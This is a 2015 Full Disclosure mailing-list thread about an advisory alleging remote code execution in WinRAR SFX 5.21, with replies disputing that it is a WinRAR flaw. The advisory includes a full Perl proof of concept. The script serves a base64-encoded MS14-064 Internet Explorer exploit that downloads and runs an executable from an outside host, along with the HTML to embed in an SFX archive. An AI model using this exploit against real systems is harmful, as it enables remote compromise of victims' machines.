In fact, a SXF file type can only try to access a specific URL (server's attacker). Then the attacker exploits a Microsoft's vulnerability (ms14-064).
The WinRAR file doesn't allow RCE by itself. -- Hernán Möller http://nivel4.com 2015-09-28 5:39 GMT-03:00 Gynvael Coldwind <[email protected]>: > Correct me if I'm wrong, but the vulnerability can be summarized as: if you > run an untrusted .exe you might execute malicious code? > > I hardly see this as giving anything new to the attacker who can just > create a malicious exe file, set the winrar sfx icon and send it to the > victim. > > Keep in mind that not every unexpected behavior or software bug is a > security vulnerability. > > (and no, potential AV bypass doesn't make it a vulnerability either) > > Cheers, > Gynvael > > On Mon, 28 Sep 2015 10:27 Vulnerability Lab < > [email protected]> > wrote: > > > Document Title: > > =============== > > WinRAR SFX v5.21 - Remote Code Execution Vulnerability > > > > > > References (Source): > > ==================== > > http://www.vulnerability-lab.com/get_content.php?id=1608 > > > > Video: https://www.youtube.com/watch?v=fo0l0oT4468 > > > > > > Release Date: > > ============= > > 2015-09-28 > > > > > > Vulnerability Laboratory ID (VL-ID): > > ==================================== > > 1608 > > > > > > Common Vulnerability Scoring System: > > ==================================== > > 9 > > > > > > Product & Service Introduction: > > =============================== > > WinRAR with over 500 million users worldwide by far the most popular > > compression program and therefore the best way to files securely and > > efficiently to pack for a data transfer to speed up the data transfer via > > e-mail and secure storage optimized files. > > > > (Copy of the Homepage: http://www.win-rar.com/start.html ) > > > > > > Abstract Advisory Information: > > ============================== > > An independent vulnerability laboratory researcher discovered a code > > execution vulnerability in the official WInRAR SFX v5.21 software. > > > > > > Vulnerability Disclosure Timeline: > > ================================== > > 2015-09-28: Public Disclosure (Vulnerability Laboratory) > > > > > > Discovery Status: > > ================= > > Published > > > > > > Exploitation Technique: > > ======================= > > Remote > > > > > > Severity Level: > > =============== > > Critical > > > > > > Technical Details & Description: > > ================================ > > A remote code execution vulnerability has been discovered in the official > > WInRAR SFX v5.21 software. > > The vulnerability allows remote attackers to unauthorized execute system > > specific code to comrpomise a target system. > > > > The issue is located in the `Text and Icon` function of the `Text to > > display in SFX window` module. Remote attackers are > > able to generate own compressed archives with maliciuous payloads to > > execute system specific codes for compromise. The attackers > > saved in the sfx archive input the malicious generated html code. Thus > > results in a system specific code execution when a target > > user or system is processing to open the comprossed archive. > > > > The security risk of the code execution vulnerability is estimated as > > critical with a cvss (common vulnerability scoring system) count of 9.2. > > Exploitation of the code execution vulnerability requires low user > > interaction (open file) without privilege system or restricted user > > accounts. > > Successful exploitation of the remote code execution vulnerability in the > > WinRAR SFX software results in system, network or device compromise. > > > > > > Proof of Concept (PoC): > > ======================= > > The code execution vulnerability can be exploited by remote attackers > > without privilege system user account or user interaction. > > For security demonstration or to reproduce the vulnerability follow the > > provided information and steps below to continue. > > > > Manual steps to reproduce the vulnerability ... > > 1. Run perl code : perl poc.pl > > 2. Right Click on any file and select "add to archive..." > > 3. Select "Create SFX archive" > > 4. Go to the Advanced Menu and select "SFX options..." > > 5. Go to the "Text and icon" Menu > > 6. Copy this perl output (HTML) and past on "Text to display in SFX > > window" > > 7. Click OK -- OK > > 8. Your SFX file Created > > 9. Just open sfx file > > 10. Your Link Download/Execute on your target > > 11. Successful reproduce of the code execution vulnerability! > > > > > > PoC: Exploit Code > > #!/usr/bin/perl > > # Title : WinRaR SFX - Remote Code Execution > > # Affected Versions: All Version > > # Tested on Windows 7 / Server 2008 > > # > > # Author: Mohammad Reza Espargham > > # Linkedin: https://ir.linkedin.com/in/rezasp > > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com > > # Website: www.reza.es > > # Twitter: https://twitter.com/rezesp > > # FaceBook: https://www.facebook.com/reza.espargham > > # > > # ID: MS14-064 > > > > use strict; > > use warnings; > > use IO::Socket; > > use MIME::Base64 qw( decode_base64 ); > > use Socket 'inet_ntoa'; > > use Sys::Hostname 'hostname'; > > > > print " Mohammad Reza Espargham\n\n"; > > my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost')); > > > > my $port = 80; > > > > print "Winrar HTML Code\n".'<html><head><title>poc</title><META > > http-equiv="refresh" content="0;URL=http://' . $ip . > > '"></head></html>'."\n\n" if($port==80); > > print "Winrar HTML Code\n".'<html><head><title>poc</title><META > > http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . > > '"></head></html>'."\n\n" if($port!=80); > > > > my $server = new IO::Socket::INET( Proto => 'tcp', > > LocalPort => $port, > > Listen => SOMAXCONN, > > ReuseAddr => 1) > > or die "Unable to create server socket"; > > > > # Server loop > > while(my $client = $server->accept()) > > { > > my $client_info; > > while(<$client>) > > { > > last if /^\r\n$/; > > $client_info .= $_; > > } > > incoming($client, $client_info); > > } > > > > sub incoming > > { > > print "\n=== Incoming Request:\n"; > > my $client = shift; > > print $client &buildResponse($client, shift); > > close($client); > > } > > > > sub buildResponse > > { > > my $client = shift; > > my $client_info = shift; > > > > my > > > $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt > > > > > dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT > > > > > Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo > > > > > ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw > > > > > cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn > > > > > aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn > > > > > LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4 > > > > > ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg > > > > > Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp > > > > > cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi > > > > > KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg > > > > > aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp > > > > > bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp > > > > > Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg > > > > > IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg > > > > > IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m > > > > > bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg > > > > > ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh > > > > > dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj > > > > > aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg > > > > > IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK > > > > > ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g > > > > > SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs > > > > > bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz > > > > > YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl > > > > > Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg > > > > > IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u > > > > > IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog > > > > > IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U > > > > > cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi > > > > > IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l > > > > > IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh > > > > > MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3 > > > > > NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0 > > > > > NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo > > > > > YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g > > > > > RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y > > > > > dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK > > > > > ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg > > > > > ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg > > > > > ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy > > > > > ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp > > > > > KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg > > > > > ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg > > > > > cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS > > > > > ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh > > > > > MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy > > > > > ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl > > > > > c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2 > > > > > Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo > > > > > YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg > > > > > ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw > > > > > ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K > > > > > ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg > > > > > ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAK > > > > > ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg > > > > > IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs > > > > > c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg > > > > > IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm > > > > > KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj > > > > > dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo > > > > > YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl > > > > > bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg > > > > > IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg > > > > > CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy > > > > > dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh > > > > > YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk > > > > > KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK > > > > > ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1 > > > > > OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi > > > > > KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+ > > CiAKPC9ib2R5Pgo8L2h0bWw+"; > > $poc = decode_base64($poc); > > > > my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n > > $poc"; > > return $r; > > } > > > > > > Security Risk: > > ============== > > The security risk of the code execution vulnerability in the winrar sfx > > software is estimated as high. (CVSS 7.4) > > > > > > Credits & Authors: > > ================== > > Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] ([email protected] > > or [email protected]] (www.reza.es) > > > > > > Disclaimer & Information: > > ========================= > > The information provided in this advisory is provided as it is without > any > > warranty. Vulnerability Lab disclaims all warranties, either expressed > > or implied, including the warranties of merchantability and capability > for > > a particular purpose. Vulnerability-Lab or its suppliers are not liable > > in any case of damage, including direct, indirect, incidental, > > consequential loss of business profits or special damages, even if > > Vulnerability-Lab > > or its suppliers have been advised of the possibility of such damages. > > Some states do not allow the exclusion or limitation of liability for > > consequential or incidental damages so the foregoing limitation may not > > apply. We do not approve or encourage anybody to break any vendor > licenses, > > policies, deface websites, hack into databases or trade with fraud/stolen > > material. > > > > Domains: www.vulnerability-lab.com - www.vuln-lab.com > > - www.evolution-sec.com > > Contact: [email protected] - > > [email protected] - > > [email protected] > > Section: magazine.vulnerability-db.com - > > vulnerability-lab.com/contact.php - > > evolution-sec.com/contact > > Social: twitter.com/#!/vuln_lab - > > facebook.com/VulnerabilityLab - > > youtube.com/user/vulnerability0lab > > Feeds: vulnerability-lab.com/rss/rss.php - > > vulnerability-lab.com/rss/rss_upcoming.php - > > vulnerability-lab.com/rss/rss_news.php > > Programs: vulnerability-lab.com/submit.php - > > vulnerability-lab.com/list-of-bug-bounty-programs.php - > > vulnerability-lab.com/register/ > > > > Any modified copy or reproduction, including partially usages, of this > > file requires authorization from Vulnerability Laboratory. Permission to > > electronically redistribute this alert in its unmodified form is granted. > > All other rights, including the use of other media, are reserved by > > Vulnerability-Lab Research Team or its suppliers. All pictures, texts, > > advisories, source code, videos and other information on this website > > is trademark of vulnerability-lab team & the specific authors or > managers. > > To record, list (feed), modify, use or edit our material contact > > ([email protected] or [email protected]) to get a > > permission. > > > > Copyright © 2015 | Vulnerability > > Laboratory - [Evolution Security GmbH]™ > > > > > > > > -- > > VULNERABILITY LABORATORY - RESEARCH TEAM > > SERVICE: www.vulnerability-lab.com > > CONTACT: [email protected] > > PGP KEY: > > > http://www.vulnerability-lab.com/keys/[email protected]%280x198E9928%29.txt > > > > > > > > _______________________________________________ > > Sent through the Full Disclosure mailing list > > https://nmap.org/mailman/listinfo/fulldisclosure > > Web Archives & RSS: http://seclists.org/fulldisclosure/ > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
